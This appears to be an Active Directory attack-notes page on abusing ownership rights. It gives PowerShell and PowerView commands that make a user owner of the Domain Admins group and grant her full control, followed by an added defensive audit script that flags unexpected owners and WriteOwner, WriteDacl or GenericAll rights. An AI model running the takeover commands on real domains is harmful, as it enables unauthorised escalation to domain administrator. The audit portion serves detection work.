AD Allowed to change owner
If you are allowed to change the owner of an object, you are in a good position: the owner always has the right to update the object's ACL, so you can set full control on the object.
Display owner with PowerShell
For bulk operations, PowerShell is the recommended tool. If you first want an overview of who owns multiple objects, there are several options available.
One approach is to generate a list of group names and owners by expanding the nTSecurityDescriptor attribute using Select-Object:
Get-ADGroup -Filter * -Properties nTSecurityDescriptor -PipelineVariable p | Select-Object -ExpandProperty nTSecurityDescriptor | Select-Object @{n="Group";e={ $p.Name }}, @{n="Owner";e={ $_.Owner }}
Set owner
# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$acl.SetOwner($user);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}
# Powerview.ps1
Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
Set Full rights
# MS AD Module
$user = new-object system.security.principal.ntaccount("object\maria")
Get-ADGroup -filter 'name -like "Domain Admins"' | foreach{$acl = Get-Acl -Path "AD:$($_.DistinguishedName)";$ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule($user,[System.DirectoryServices.ActiveDirectoryRights]::GenericAll,[System.Security.AccessControl.AccessControlType]::Allow);$acl.AddAccessRule($ace);Set-Acl -Path "AD:$($_.DistinguishedName)" $acl;}
# Powerview.ps1
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
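Audit for unexpected owners and rights
The two properties changed above, the owner and the DACL, can be audited from the defender's side. The following is an added example, not part of the original page: the function name Find-RiskyOwnership, the baseline principal list and the sample records are assumptions made for illustration, and the baseline has to be tuned per domain.

```powershell
# Added example: flag unexpected owners and principals that can change owner or DACL.
# $ExpectedPrincipals is an assumed baseline, not a complete list of defaults.
function Find-RiskyOwnership {
    param(
        [Parameter(Mandatory, ValueFromPipeline)] $Record,
        [string[]] $ExpectedPrincipals = @(
            'OBJECT\Domain Admins', 'OBJECT\Enterprise Admins',
            'BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM')
    )
    process {
        # Finding 1: owner outside the baseline (an owner can always rewrite the DACL).
        if ("$($Record.Owner)" -notin $ExpectedPrincipals) {
            [pscustomobject]@{ Object = $Record.Name; Principal = "$($Record.Owner)"; Issue = 'UnexpectedOwner' }
        }
        # Finding 2: Allow ACEs that let a non-baseline principal take ownership
        # or edit the DACL. GenericAll includes both WriteOwner and WriteDacl.
        foreach ($ace in $Record.Access) {
            if ("$($ace.AccessControlType)" -eq 'Allow' -and
                "$($ace.ActiveDirectoryRights)" -match 'WriteOwner|WriteDacl|GenericAll' -and
                "$($ace.IdentityReference)" -notin $ExpectedPrincipals) {
                [pscustomobject]@{ Object = $Record.Name; Principal = "$($ace.IdentityReference)"; Issue = "$($ace.ActiveDirectoryRights)" }
            }
        }
    }
}

# Constructed sample records so the logic can be run without a domain.
$sample = @(
    [pscustomobject]@{ Name = 'Domain Admins'; Owner = 'OBJECT\maria'; Access = @(
        [pscustomobject]@{ IdentityReference = 'OBJECT\maria'; ActiveDirectoryRights = 'GenericAll'; AccessControlType = 'Allow' },
        [pscustomobject]@{ IdentityReference = 'OBJECT\Domain Admins'; ActiveDirectoryRights = 'GenericAll'; AccessControlType = 'Allow' }) },
    [pscustomobject]@{ Name = 'Helpdesk'; Owner = 'OBJECT\Domain Admins'; Access = @(
        [pscustomobject]@{ IdentityReference = 'OBJECT\svc-hd'; ActiveDirectoryRights = 'ReadProperty, WriteOwner'; AccessControlType = 'Allow' }) }
)
$sample | Find-RiskyOwnership | Format-Table -AutoSize

# Live use (requires the ActiveDirectory module and its AD: drive):
# Get-ADGroup -Filter * | ForEach-Object {
#     $sd = Get-Acl -Path "AD:$($_.DistinguishedName)"
#     [pscustomobject]@{ Name = $_.Name; Owner = $sd.Owner; Access = $sd.Access }
# } | Find-RiskyOwnership
```

On the sample data this reports maria twice on Domain Admins (as owner and as a GenericAll holder) and svc-hd on Helpdesk for WriteOwner.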